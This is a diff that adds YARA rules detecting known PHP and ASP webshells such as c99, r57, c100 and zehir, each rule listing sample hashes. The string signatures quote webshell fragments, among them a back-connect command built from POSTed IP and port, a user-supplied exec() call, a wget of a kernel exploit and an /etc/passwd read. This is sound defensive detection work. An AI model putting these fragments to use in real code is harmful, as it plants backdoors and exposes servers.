+		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+	strings:
+		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
+		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
+	condition:
+		filesize < 900KB and all of them
+}
+
+rule Webshell_27_9_acid_c99_locus7s {
+	meta:
+		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
+		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+	strings:
+		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
+		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
+	condition:
+		filesize < 1711KB and 1 of them
+}
+
+rule Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 {
+	meta:
+		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
+		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
+		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
+		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+	strings:
+		$s1 = "$_POST['cmd'] = which('" ascii
+		$s2 = "$blah = ex(" fullword ascii
+	condition:
+		filesize < 600KB and all of them
+}
+
+rule Webshell_c100 {
+	meta:
+		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+	strings:
+		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
+		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
+		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
+		$s4 = "which wget curl w3m lynx" ascii
+		$s6 = "netstat -atup | grep IST"  ascii
+	condition:
+		filesize < 685KB and 2 of them
+}
+
+rule Webshell_AcidPoison {
+	meta:
+		description = "Detects Poison Sh3ll - Webshell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+	strings:
+		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
+	condition:
+		filesize < 550KB and all of them
+}
+
+rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 {
+	meta:
+		description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
+		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
+	condition:
+		filesize < 882KB and all of them
+}
+
+rule Webshell_Ayyildiz {
+	meta:
+		description = "Detects Webshell - rule generated from from files Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt, Macker's Private PHPShell.php, matamu.txt, myshell.txt, PHP Shell.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
+		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
+		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
+		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
+		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
+	strings:
+		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
+		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
+	condition:
+		filesize < 112KB and all of them
+}
+
+rule Webshell_zehir {
+	meta:
+		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
+		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
+		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
+		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
+		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
+	strings:
+		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
+		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
+	condition:
+		filesize < 200KB and 1 of them
+}